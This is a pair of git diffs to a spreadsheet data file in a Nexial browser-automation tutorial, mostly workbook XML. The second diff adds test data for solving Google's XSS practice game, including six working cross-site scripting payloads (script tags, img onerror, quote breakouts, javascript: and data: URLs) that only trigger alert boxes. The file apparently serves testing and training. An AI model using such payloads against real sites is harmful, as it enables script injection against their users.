--- a/artifact/data/web-06.data.xlsx
+++ b/artifact/data/web-06.data.xlsx
@@ -1,22 +1,23 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="10226"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="10723"/>
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/ml093043/projects/nexial/nexial-core/template/"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/ml093043/projects/nexial/tutorials/artifact/data/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3595D929-648B-E548-93C4-75A384EEC0D1}" xr6:coauthVersionLast="31" xr6:coauthVersionMax="31" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{361E04EC-E653-944B-AF20-C30E7C72A226}" xr6:coauthVersionLast="34" xr6:coauthVersionMax="34" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="7360" yWindow="440" windowWidth="33600" windowHeight="20540" tabRatio="500" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="25600" yWindow="440" windowWidth="25600" windowHeight="7840" tabRatio="500" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="#default" sheetId="2" r:id="rId1"/>
+    <sheet name="hello-world" sheetId="3" r:id="rId2"/>
   </sheets>
   <externalReferences>
-    <externalReference r:id="rId2"/>
+    <externalReference r:id="rId3"/>
   </externalReferences>
   <definedNames>
     <definedName name="base">'[1]#system'!$B$2:$B$24</definedName>
@@ -36,7 +37,7 @@
     <definedName name="webcookie">'[1]#system'!$O$2:$O$8</definedName>
     <definedName name="ws">'[1]#system'!$P$2:$P$15</definedName>
   </definedNames>
-  <calcPr calcId="171027"/>
+  <calcPr calcId="179021"/>
   <extLst>
     <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{79F54976-1DA5-4618-B147-4CDE4B953A38}">
       <x14:workbookPr defaultImageDpi="32767"/>
@@ -49,42 +50,99 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="14" uniqueCount="12">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="34" uniqueCount="31">
   <si>
     <t>true</t>
   </si>
   <si>
-    <t>800</t>
-  </si>
-  <si>
     <t>,</t>
   </si>
   <si>
+    <t>false</t>
+  </si>
+  <si>
+    <t>nexial.scope.fallbackToPrevious</t>
+  </si>
+  <si>
+    <t>nexial.pollWaitMs</t>
+  </si>
+  <si>
+    <t>nexial.failFast</t>
+  </si>
+  <si>
+    <t>nexial.textDelim</t>
+  </si>
+  <si>
+    <t>nexial.verbose</t>
+  </si>
+  <si>
+    <t>nexial.openResult</t>
+  </si>
+  <si>
+    <t>aut : url</t>
+  </si>
+  <si>
+    <t>aut : title</t>
+  </si>
+  <si>
+    <t>"Hello, World!" program - Wikipedia</t>
+  </si>
+  <si>
+    <t>aut : copyRight</t>
+  </si>
+  <si>
+    <t>Text is available under the Creative Commons Attribution-ShareAlike License; additional terms may apply.</t>
+  </si>
+  <si>
+    <t>aut : keyword</t>
+  </si>
+  <si>
+    <t>Hello World</t>
+  </si>
+  <si>
+    <t>newline : url</t>
+  </si>
+  <si>
+    <t>https://en.wikipedia.org/wiki/Newline</t>
+  </si>
+  <si>
+    <t>Newline - Wikipedia</t>
+  </si>
+  <si>
+    <t>newline : title</t>
+  </si>
+  <si>
+    <t>newline : excerpt</t>
+  </si>
+  <si>
+    <t>U+2424 (SYMBOL FOR NEWLINE, ␤), U+23CE (RETURN SYMBOL, ⏎), U+240D (SYMBOL FOR CARRIAGE RETURN, ␍) and U+240A (SYMBOL FOR LINE FEED, ␊)</t>
+  </si>
+  <si>
+    <t>https://en.wikipedia.org/wiki/%22Hello,_World!%22_program</t>
+  </si>
+  <si>
+    <t>750</t>
+  </si>
+  <si>
+    <t>chrome</t>
+  </si>
+  <si>
+    <t>250</t>
+  </si>
+  <si>
+    <t>nexial.scope.iteration</t>
+  </si>
+  <si>
     <t>1</t>
   </si>
   <si>
-    <t>false</t>
-  </si>
-  <si>
-    <t>nexial.scope.fallbackToPrevious</t>
-  </si>
-  <si>
-    <t>nexial.scope.iteration</t>
-  </si>
-  <si>
-    <t>nexial.pollWaitMs</t>
-  </si>
-  <si>
-    <t>nexial.failFast</t>
-  </si>
-  <si>
-    <t>nexial.textDelim</t>
-  </si>
-  <si>
-    <t>nexial.verbose</t>
-  </si>
-  <si>
-    <t>nexial.openResult</t>
+    <t>//nexial.browser</t>
+  </si>
+  <si>
+    <t>//nexial.highlightWaitMs</t>
+  </si>
+  <si>
+    <t>//nexial.highlight</t>
   </si>
 </sst>
 </file>
@@ -213,7 +271,72 @@
     <cellStyle name="Hyperlink" xfId="5" builtinId="8" hidden="1"/>
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="5">
+  <dxfs count="10">
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
     <dxf>
       <font>
         <b val="0"/>
@@ -568,7 +691,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <dimension ref="A1:AAA10"/>
+  <dimension ref="A1:AAA9"/>
   <sheetViews>
     <sheetView tabSelected="1" zoomScalePageLayoutView="125" workbookViewId="0">
       <selection activeCell="A8" sqref="A8"/>
@@ -585,7 +708,7 @@
   <sheetData>
     <row r="1" spans="1:703">
       <c r="A1" s="1" t="s">
-        <v>5</v>
+        <v>3</v>
       </c>
       <c r="B1" s="2" t="s">
         <v>0</v>
@@ -595,37 +718,37 @@
     </row>
     <row r="2" spans="1:703">
       <c r="A2" s="1" t="s">
-        <v>6</v>
+        <v>4</v>
       </c>
       <c r="B2" s="2" t="s">
-        <v>3</v>
+        <v>25</v>
       </c>
       <c r="HA2" s="6"/>
       <c r="AAA2" s="6"/>
     </row>
     <row r="3" spans="1:703">
       <c r="A3" s="1" t="s">
-        <v>7</v>
+        <v>5</v>
       </c>
       <c r="B3" s="2" t="s">
-        <v>1</v>
-      </c>
-      <c r="HA3" s="6"/>
-      <c r="AAA3" s="6"/>
+        <v>2</v>
+      </c>
+      <c r="HA3" s="4"/>
+      <c r="AAA3" s="5"/>
     </row>
     <row r="4" spans="1:703">
       <c r="A4" s="1" t="s">
-        <v>8</v>
+        <v>6</v>
       </c>
       <c r="B4" s="2" t="s">
-        <v>4</v>
+        <v>1</v>
       </c>
       <c r="HA4" s="4"/>
       <c r="AAA4" s="5"/>
     </row>
     <row r="5" spans="1:703">
       <c r="A5" s="1" t="s">
-        <v>9</v>
+        <v>7</v>
       </c>
       <c r="B5" s="2" t="s">
         <v>2</v>
@@ -635,17 +758,17 @@
     </row>
     <row r="6" spans="1:703">
       <c r="A6" s="1" t="s">
-        <v>10</v>
+        <v>8</v>
       </c>
       <c r="B6" s="2" t="s">
-        <v>4</v>
+        <v>0</v>
       </c>
       <c r="HA6" s="4"/>
       <c r="AAA6" s="5"/>
     </row>
     <row r="7" spans="1:703">
       <c r="A7" s="1" t="s">
-        <v>11</v>
+        <v>30</v>
       </c>
       <c r="B7" s="2" t="s">
         <v>0</v>
@@ -654,6 +777,12 @@
       <c r="AAA7" s="5"/>
     </row>
     <row r="8" spans="1:703">
+      <c r="A8" s="1" t="s">
+        <v>29</v>
+      </c>
+      <c r="B8" s="2" t="s">
+        <v>23</v>
+      </c>
       <c r="HA8" s="4"/>
       <c r="AAA8" s="5"/>
     </row>
@@ -661,9 +790,138 @@
       <c r="HA9" s="4"/>
       <c r="AAA9" s="5"/>
     </row>
-    <row r="10" spans="1:703">
-      <c r="HA10" s="4"/>
-      <c r="AAA10" s="5"/>
+  </sheetData>
+  <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
+  <conditionalFormatting sqref="A1:A1048576">
+    <cfRule type="beginsWith" dxfId="9" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+      <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
+    </cfRule>
+    <cfRule type="beginsWith" dxfId="8" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
+      <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="7" priority="3" stopIfTrue="1">
+      <formula>LEN(TRIM(A1))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B1:B1048576">
+    <cfRule type="expression" dxfId="6" priority="4" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="5" priority="5">
+      <formula>LEN(TRIM(B1))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup orientation="portrait" horizontalDpi="0" verticalDpi="0"/>
+</worksheet>
+</file>
+
+<file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{02992098-561F-1944-A340-34CB95735B3B}">
+  <dimension ref="A1:AAA9"/>
+  <sheetViews>
+    <sheetView zoomScale="118" zoomScalePageLayoutView="125" workbookViewId="0">
+      <selection activeCell="A10" sqref="A10"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
+  <cols>
+    <col min="1" max="1" width="34" style="1" customWidth="1" collapsed="1"/>
+    <col min="2" max="2" width="27" style="2" customWidth="1" collapsed="1"/>
+    <col min="3" max="9" width="27" style="3" customWidth="1" collapsed="1"/>
+    <col min="10" max="27" width="21.1640625" style="3" customWidth="1" collapsed="1"/>
+    <col min="28" max="16384" width="10.83203125" style="3" collapsed="1"/>
+  </cols>
+  <sheetData>
+    <row r="1" spans="1:703">
+      <c r="A1" s="1" t="s">
+        <v>26</v>
+      </c>
+      <c r="B1" s="2" t="s">
+        <v>27</v>
+      </c>
+      <c r="HA1" s="6"/>
+      <c r="AAA1" s="6"/>
+    </row>
+    <row r="2" spans="1:703">
+      <c r="A2" s="1" t="s">
+        <v>9</v>
+      </c>
+      <c r="B2" s="2" t="s">
+        <v>22</v>
+      </c>
+      <c r="HA2" s="6"/>
+      <c r="AAA2" s="6"/>
+    </row>
+    <row r="3" spans="1:703">
+      <c r="A3" s="1" t="s">
+        <v>10</v>
+      </c>
+      <c r="B3" s="2" t="s">
+        <v>11</v>
+      </c>
+      <c r="HA3" s="4"/>
+      <c r="AAA3" s="5"/>
+    </row>
+    <row r="4" spans="1:703">
+      <c r="A4" s="1" t="s">
+        <v>12</v>
+      </c>
+      <c r="B4" s="2" t="s">
+        <v>13</v>
+      </c>
+      <c r="HA4" s="4"/>
+      <c r="AAA4" s="5"/>
+    </row>
+    <row r="5" spans="1:703">
+      <c r="A5" s="1" t="s">
+        <v>14</v>
+      </c>
+      <c r="B5" s="2" t="s">
+        <v>15</v>
+      </c>
+      <c r="HA5" s="4"/>
+      <c r="AAA5" s="5"/>
+    </row>
+    <row r="6" spans="1:703">
+      <c r="A6" s="1" t="s">
+        <v>16</v>
+      </c>
+      <c r="B6" s="2" t="s">
+        <v>17</v>
+      </c>
+      <c r="HA6" s="4"/>
+      <c r="AAA6" s="5"/>
+    </row>
+    <row r="7" spans="1:703">
+      <c r="A7" s="1" t="s">
+        <v>19</v>
+      </c>
+      <c r="B7" s="2" t="s">
+        <v>18</v>
+      </c>
+      <c r="HA7" s="4"/>
+      <c r="AAA7" s="5"/>
+    </row>
+    <row r="8" spans="1:703">
+      <c r="A8" s="1" t="s">
+        <v>20</v>
+      </c>
+      <c r="B8" s="2" t="s">
+        <v>21</v>
+      </c>
+      <c r="HA8" s="4"/>
+      <c r="AAA8" s="5"/>
+    </row>
+    <row r="9" spans="1:703">
+      <c r="A9" s="1" t="s">
+        <v>28</v>
+      </c>
+      <c r="B9" s="2" t="s">
+        <v>24</v>
+      </c>
+      <c r="HA9" s="4"/>
+      <c r="AAA9" s="5"/>
     </row>
   </sheetData>
   <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>

--- a/artifact/data/web-06.data.xlsx
+++ b/artifact/data/web-06.data.xlsx
@@ -1,20 +1,20 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="10723"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="10904"/>
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/ml093043/projects/nexial/tutorials/artifact/data/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{361E04EC-E653-944B-AF20-C30E7C72A226}" xr6:coauthVersionLast="34" xr6:coauthVersionMax="34" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F9713E2C-3258-9B44-AD6B-3DDB5959648F}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="25600" yWindow="440" windowWidth="25600" windowHeight="7840" tabRatio="500" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="0" yWindow="440" windowWidth="25600" windowHeight="19340" tabRatio="500" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="#default" sheetId="2" r:id="rId1"/>
-    <sheet name="hello-world" sheetId="3" r:id="rId2"/>
+    <sheet name="level1" sheetId="3" r:id="rId2"/>
   </sheets>
   <externalReferences>
     <externalReference r:id="rId3"/>
@@ -50,7 +50,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="34" uniqueCount="31">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="84" uniqueCount="73">
   <si>
     <t>true</t>
   </si>
@@ -79,77 +79,203 @@
     <t>nexial.openResult</t>
   </si>
   <si>
-    <t>aut : url</t>
-  </si>
-  <si>
-    <t>aut : title</t>
-  </si>
-  <si>
-    <t>"Hello, World!" program - Wikipedia</t>
-  </si>
-  <si>
-    <t>aut : copyRight</t>
-  </si>
-  <si>
-    <t>Text is available under the Creative Commons Attribution-ShareAlike License; additional terms may apply.</t>
-  </si>
-  <si>
-    <t>aut : keyword</t>
-  </si>
-  <si>
-    <t>Hello World</t>
-  </si>
-  <si>
-    <t>newline : url</t>
-  </si>
-  <si>
-    <t>https://en.wikipedia.org/wiki/Newline</t>
-  </si>
-  <si>
-    <t>Newline - Wikipedia</t>
-  </si>
-  <si>
-    <t>newline : title</t>
-  </si>
-  <si>
-    <t>newline : excerpt</t>
-  </si>
-  <si>
-    <t>U+2424 (SYMBOL FOR NEWLINE, ␤), U+23CE (RETURN SYMBOL, ⏎), U+240D (SYMBOL FOR CARRIAGE RETURN, ␍) and U+240A (SYMBOL FOR LINE FEED, ␊)</t>
-  </si>
-  <si>
-    <t>https://en.wikipedia.org/wiki/%22Hello,_World!%22_program</t>
-  </si>
-  <si>
     <t>750</t>
   </si>
   <si>
-    <t>chrome</t>
-  </si>
-  <si>
     <t>250</t>
   </si>
   <si>
-    <t>nexial.scope.iteration</t>
-  </si>
-  <si>
-    <t>1</t>
-  </si>
-  <si>
-    <t>//nexial.browser</t>
-  </si>
-  <si>
     <t>//nexial.highlightWaitMs</t>
   </si>
   <si>
     <t>//nexial.highlight</t>
+  </si>
+  <si>
+    <t>site url</t>
+  </si>
+  <si>
+    <t>https://xss-game.appspot.com/</t>
+  </si>
+  <si>
+    <t>enter site text</t>
+  </si>
+  <si>
+    <t>Let me at 'em!</t>
+  </si>
+  <si>
+    <t>level1 page title</t>
+  </si>
+  <si>
+    <t>Level 1: Hello, world of XSS</t>
+  </si>
+  <si>
+    <t>target frame loc</t>
+  </si>
+  <si>
+    <t>//iframe</t>
+  </si>
+  <si>
+    <t>id=query</t>
+  </si>
+  <si>
+    <t>&lt;script&gt;alert('Hello');&lt;/script&gt;</t>
+  </si>
+  <si>
+    <t>id=button</t>
+  </si>
+  <si>
+    <t>pass text</t>
+  </si>
+  <si>
+    <t>You can now advance to the next level.</t>
+  </si>
+  <si>
+    <t>top frame loc</t>
+  </si>
+  <si>
+    <t>relative=top</t>
+  </si>
+  <si>
+    <t>next level loc</t>
+  </si>
+  <si>
+    <t>css=a.next-button</t>
+  </si>
+  <si>
+    <t>level2 page title</t>
+  </si>
+  <si>
+    <t>Level 2: Persistence is key</t>
+  </si>
+  <si>
+    <t>xss1</t>
+  </si>
+  <si>
+    <t>level2 input loc</t>
+  </si>
+  <si>
+    <t>id=post-content</t>
+  </si>
+  <si>
+    <t>xss2</t>
+  </si>
+  <si>
+    <t>level2 submit loc</t>
+  </si>
+  <si>
+    <t>css=input.share</t>
+  </si>
+  <si>
+    <t>level1 input loc</t>
+  </si>
+  <si>
+    <t>level1 submit loc</t>
+  </si>
+  <si>
+    <t>&lt;img src="file://inexist.ent" onerror="javascript:alert('Hello')"/&gt;</t>
+  </si>
+  <si>
+    <t>level3 page title</t>
+  </si>
+  <si>
+    <t>level3 input loc</t>
+  </si>
+  <si>
+    <t>xss3</t>
+  </si>
+  <si>
+    <t>level3 submit loc</t>
+  </si>
+  <si>
+    <t>id=input1</t>
+  </si>
+  <si>
+    <t>https://xss-game.appspot.com/level3/frame#3' onerror='alert("Hello")';</t>
+  </si>
+  <si>
+    <t>css=input.urlbutton</t>
+  </si>
+  <si>
+    <t>level4 page title</t>
+  </si>
+  <si>
+    <t>level4 input loc</t>
+  </si>
+  <si>
+    <t>xss4</t>
+  </si>
+  <si>
+    <t>level4 submit loc</t>
+  </si>
+  <si>
+    <t>Level 4: Context matters</t>
+  </si>
+  <si>
+    <t>https://xss-game.appspot.com/level4/frame?timer=')%3Balert("Hello")%3Bvar b=('</t>
+  </si>
+  <si>
+    <t>level5 page title</t>
+  </si>
+  <si>
+    <t>level5 input loc</t>
+  </si>
+  <si>
+    <t>xss5</t>
+  </si>
+  <si>
+    <t>level5 submit loc</t>
+  </si>
+  <si>
+    <t>Level 5: Breaking protocol</t>
+  </si>
+  <si>
+    <t>https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('Hello')</t>
+  </si>
+  <si>
+    <t>level5 input2 loc</t>
+  </si>
+  <si>
+    <t>level5 submit2 loc</t>
+  </si>
+  <si>
+    <t>id=reader-email</t>
+  </si>
+  <si>
+    <t>//a[text()='Next &gt;&gt;']</t>
+  </si>
+  <si>
+    <t>leve5 input2</t>
+  </si>
+  <si>
+    <t>nobodyhere@nowhere.com</t>
+  </si>
+  <si>
+    <t>Level 3: That sinking feeling</t>
+  </si>
+  <si>
+    <t>level6 page title</t>
+  </si>
+  <si>
+    <t>Level 6: Follow the</t>
+  </si>
+  <si>
+    <t>level6 input loc</t>
+  </si>
+  <si>
+    <t>xss6</t>
+  </si>
+  <si>
+    <t>level6 submit loc</t>
+  </si>
+  <si>
+    <t>https://xss-game.appspot.com/level6/frame#data:text/javascript,alert('Hello')</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="7">
+  <fonts count="8">
     <font>
       <sz val="12"/>
       <color theme="1"/>
@@ -195,6 +321,12 @@
       <family val="2"/>
       <scheme val="minor"/>
     </font>
+    <font>
+      <sz val="12"/>
+      <color rgb="FF000000"/>
+      <name val="Courier New"/>
+      <family val="1"/>
+    </font>
   </fonts>
   <fills count="2">
     <fill>
@@ -204,7 +336,7 @@
       <patternFill patternType="gray125"/>
     </fill>
   </fills>
-  <borders count="2">
+  <borders count="3">
     <border>
       <left/>
       <right/>
@@ -227,6 +359,21 @@
       </bottom>
       <diagonal/>
     </border>
+    <border>
+      <left style="hair">
+        <color rgb="FFC9C9C9"/>
+      </left>
+      <right style="hair">
+        <color rgb="FFC9C9C9"/>
+      </right>
+      <top style="hair">
+        <color rgb="FFC9C9C9"/>
+      </top>
+      <bottom style="hair">
+        <color rgb="FFC9C9C9"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="7">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
@@ -237,7 +384,7 @@
     <xf numFmtId="0" fontId="5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="7">
+  <cellXfs count="8">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="49" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
       <alignment horizontal="left" vertical="center"/>
@@ -261,6 +408,10 @@
       <alignment horizontal="left" vertical="center"/>
       <protection locked="0"/>
     </xf>
+    <xf numFmtId="49" fontId="7" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
+      <alignment horizontal="left" vertical="center"/>
+      <protection locked="0"/>
+    </xf>
   </cellXfs>
   <cellStyles count="7">
     <cellStyle name="Followed Hyperlink" xfId="2" builtinId="9" hidden="1"/>
@@ -271,7 +422,230 @@
     <cellStyle name="Hyperlink" xfId="5" builtinId="8" hidden="1"/>
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="10">
+  <dxfs count="27">
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
